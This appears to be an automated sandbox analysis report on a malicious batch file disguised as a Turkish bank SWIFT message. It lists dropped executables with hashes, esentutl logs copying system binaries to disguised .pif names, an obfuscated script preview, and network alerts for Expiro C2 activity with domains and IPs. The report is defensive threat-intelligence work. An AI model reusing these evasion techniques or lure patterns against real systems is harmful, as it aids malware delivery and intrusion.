                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):410
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2232
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.379460230152629
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4DC84D28CF28EAE82806A5390E5721C8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1425408
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.680690579464684
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:Zk70Trcosu4CTPpR9+aHsqjnhMgeiCl7G0nehbGZpbD:ZkQTAW5v+ADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:51A2DCBBA6BCBB069A3A5AB77659D46E98B02289
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:A7BA9EAC2A255CAB335D7B0D00DA00C962E2BECC8AEBF313434E861C502D5DD9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E3CB79FB953D247C98B06E64EFE737D53EB57233B43B4FD2A637EBD0F5C9FF088ADCAF4CFFC095AA6A6CE7B87F4B9812D1D8B76A0D27BBBBB4955FA57260ADB7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):70656
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.910353963160109
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.98372538260074
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:vwYb+26AVyUqPFlrSyvJAio9jrwwIAfOzye:vwYq9A1wFkiEoAfO5
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C5FCF923F08157748C04AA0D3A075A74
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:BF9AA3683FD0E4A4EF1DF1411DEC7CE44A8E6EAA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:E7E92999491AB41C337CFE2C20D6F1D2D88548CF2CC1AB8043B58CE4719302DD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6250089C0436BF4FD019D52D52FDF2E5EFDB9C126D4B2159446E7B6E28C6A3DF73C9075F56DC3CFEBD6ACC9152C0DE9584872E32107E9265E2EF11E44459C304
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):665670656
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999999298369035
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:CF9744BAE8DCA89FA01C529ED42F3A18
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:71A3CE9A7DBF7A58EC07E633C62612F9CBB5142B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:01998B6C87CA756F3C44892FAA270DA1857606DD6C2EDDCEB6F15CD4F4C86DBC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A1F3112C3F0BC3B8F54F2F9644DD6F77E51EDC2773600A18A6974F31F88FCDCD35D604B405835D2E376130D6A31323C6C079DFB50546278CC6BA8882245F6381
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1810
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.4095045126518184
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:8e2CzKgWLqeMNmG9l6R+O4ZvPqRyJpqy:8F06R+ZXqRzy
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B9B080101D1661C181D515292FB5D357
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:DCD1BBBE568D19631543A4339CC2724BA83E3245
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:8E9FE4BF96A88EF8BCEF4709E99B6FCB3620733539078ECFFFF99F8A4DBF06C3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:4EBA1F71935639855E34620243CBA72C0FECBCEF25C27D0CA3CEE848D6252D3C61D63292A94B652BF1634F61F8D0DBB74279250F9D93044BA735D9E5DCDB9EE9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@....................................................../....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.2.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe.........................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.2537563482049645
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:UQW4qoNUgslKNX0Ip0MgHCpoMBOussqjnhMgeiCl7G0nehbGZpbD:UQW9BKNX0IPgiKMBOuYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6341995A4613FCE6AD6219013E4B7646
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A734947115A3C14940F79660F04EAA742677E699
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:6977D73CEC77F46ADEBE2809D089DBADB2C7F01A76F6CDDD96687C4C33F88AF4
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:B5C7995E71AAF2E05FDB87FAE445495495DD3F266409D396D418377276E6326B714F705D788B79FC3C5B8548A0B18156A8AFF91F41B6401927FDA4E13A32177E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.163547813718077
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:f2G7AbHjkbsqjnhMgeiCl7G0nehbGZpbD:f2G7AbHjeDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:7E1C5BCA8DE62ADD1CB8360215694BC4
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:4809B60DC3607C238CC67F7A8E773224DADFF156
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4C4B1E316610A7F4405D8C6EE4446D3DA5F8DE51F4389FE8126D34ECB05ED54D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3E20D907F0C5C359F91202BAD79692B6C7B59868CB5D602258DB8DE24D2165C6CE462B51578B8B3413EFB42D6331E8E928EE6DB00D9395A8AAFB8474866B99A3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.288938921389206
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:hkdpSI+K3S/GWei+qNv2uG3jsqjnhMgeiCl7G0nehbGZpbD:h6SIGGWei2uG3nDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:91AE0BDAC8CCF3A870D04230C5CC395C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A065E9DD486ADA6D81C2C309D47095ADB2651337
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D8184E9B31202686EE7FA1E951BF053A9D53EA5935B6D02FB1BBDE5822BEA42E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:EC62D5C9E67EB3A34FB8CED275AA3E00249E5D2EDB5639CF2CE450CE8BDB1626AEB34C7E1C3BD9FC1013725A02E221E7586DAFE6B2DCC415204CD2E7BF4835C1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.163309392911544
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:YEP3R6CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:z6CsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:1E467BDA5911F0899BC6AC04CDE8ACA5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:814AB7D4B9395E2B88429A46AD4CFED35788181B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:32951D46611B5D1F47B4994479EA48336164DB61BE2DC883C9C9E132DA9B71A9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:7D977E49EB7B300BD61E735594CADF05DE4762E8AD765010F1DC86C2878138C7572F8536CA9710F0BCB501A6DE1C615D562ED53AF43E3820BC4B70A10E599FCE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.987101119787822
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:g8/K7vKQ6GFWOIagVFYaT1Z8VX5UJCWooJkGX62alv2KarAkWCalUEtPwLeE6ef:jyjWj1oJACWooJk5lvY6UEhwh6ef
MD5: AEC764A5D1AF857F6C6590922F3DDB3B
SHA1: DEC3772D8D61DA1E90C512294EFDD3EAA7DF77E9
SHA-256: EFE33CC12742987CD66160457EF3AA28AF975F65B300B8345943E1E93B05D12D
SHA-512: 90E42E9C2FFFA6143C642B0860C23A5E657BA5C22F3B3D10BE924BEDBDB3E7A36AF76B833DDAA6AC4EA576DEA5188FD262E5582E2E592871BD7B4231070F4A9D
Malicious: false
Reputation: unknown

Process: C:\Windows\SysWOW64\esentutl.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 590
Entropy (8bit): 4.641306414537991
Encrypted: false
SSDEEP: 12:qzBBVmXxTzmBzeSbZ7u0wxDDDDDDDDjCaY5+8VQlaYAZbTB8NGNZ:iBB0XxTzkzp7u0wQakj6azt8N2
MD5: 07CD550BE7A4071DACEC06B8EA394E8B
SHA1: 2B6DEB5E54C501C56A236A0B1A80F9062DD82E10
SHA-256: 2EB716BAD1EEA76E0E1AFF98E8816F462828A911E3260D8A78044353395F4E7D
SHA-512: 67D949AB677B5D9A4D85CE97E9301A57DF82B13B20A424C65CE1F0E79C61ECBEA1853C22DA3B35176DFA747E59EC727DD8C4E29EDE88E3FBA89B9058B13D0689
Malicious: false
Reputation: unknown
Preview: ..Initiating COPY FILE mode..... Source File: C:\Users\Public\Libraries\AnyDesk.PIF...Destination File: C:\\Users\\Public\\Libraries\\Juqmtmya.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12ea00 (1239552) (1 MB)....Total bytes written = 0x12f000 (1241088) (1 MB).......Operation completed successfully in 0.203 seconds.....

Process: C:\Windows\SysWOW64\esentutl.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 560
Entropy (8bit): 4.532578488470501
Encrypted: false
SSDEEP: 12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
MD5: 4D6C195EBA3736E57EF6A03F1EEEF490
SHA1: 237210C613550627B46D6D6AB82F396EACA3EA20
SHA-256: FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
SHA-512: 2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
Malicious: false
Reputation: unknown
Preview: ..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....

File type: Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
Entropy (8bit): 4.977049747966403
TrID:
File name: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd
File size: 3'418'572 bytes
MD5: 55275e90f2a4ca23422103276e8eae71
SHA1: 1799345fb5bf3cf04c44bfa5b59790c9e4e8a0af
SHA256: 0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596
SHA512: 4ca26d59cba2e38751f527b12d040f1e5e67742020e3e0f93551b60f8600451e438c547d3c954778fc019889f93fb39a89ef5b214c4433a6c3f220ddabe7c26d
SSDEEP: 24576:IHZYL1t28pLiMl5F3p03CX4axBJGhRCB4L90l6f2tliYajE/BPbN650iKBzFufPS:I5YLHFi05X03krZUFCsILZ4AX
TLSH: 7AF5B8EB3EBD274E670433AF5B4FF559072FCD140B815EC844C609C8959A71B29A0EAE
File Content Preview: COMCOM@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ....
Icon Hash: 9686878b929a9886

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-18T09:57:16.977508+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49731 | 198.252.105.91 | 443 | TCP
2024-11-18T09:57:29.615807+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.10 | 49801 | TCP
2024-11-18T09:57:29.615807+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.10 | 49801 | TCP
2024-11-18T09:57:32.855723+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.10 | 49817 | 54.244.188.177 | 80 | TCP
2024-11-18T09:57:32.879896+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.10 | 49813 | TCP
2024-11-18T09:57:32.879896+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.10 | 49813 | TCP
2024-11-18T09:57:35.956534+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.10 | 49837 | TCP
2024-11-18T09:57:35.956534+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.10 | 49837 | TCP
2024-11-18T09:57:36.575900+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.10 | 57324 | 1.1.1.1 | 53 | UDP
2024-11-18T09:57:38.044740+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.10 | 62937 | 1.1.1.1 | 53 | UDP
2024-11-18T09:57:38.352389+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.10 | 65337 | 1.1.1.1 | 53 | UDP
2024-11-18T09:57:41.443007+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.10 | 62395 | 1.1.1.1 | 53 | UDP
2024-11-18T09:58:15.074598+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.10 | 50000 | TCP
2024-11-18T09:58:15.074598+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.10 | 50000 | TCP
2024-11-18T09:58:19.231096+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.10 | 55594 | 1.1.1.1 | 53 | UDP
2024-11-18T09:58:20.626004+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.10 | 62389 | 1.1.1.1 | 53 | UDP
2024-11-18T09:58:23.402709+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.246.200.160 | 80 | 192.168.2.10 | 50015 | TCP
2024-11-18T09:58:23.402709+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.246.200.160 | 80 | 192.168.2.10 | 50015 | TCP
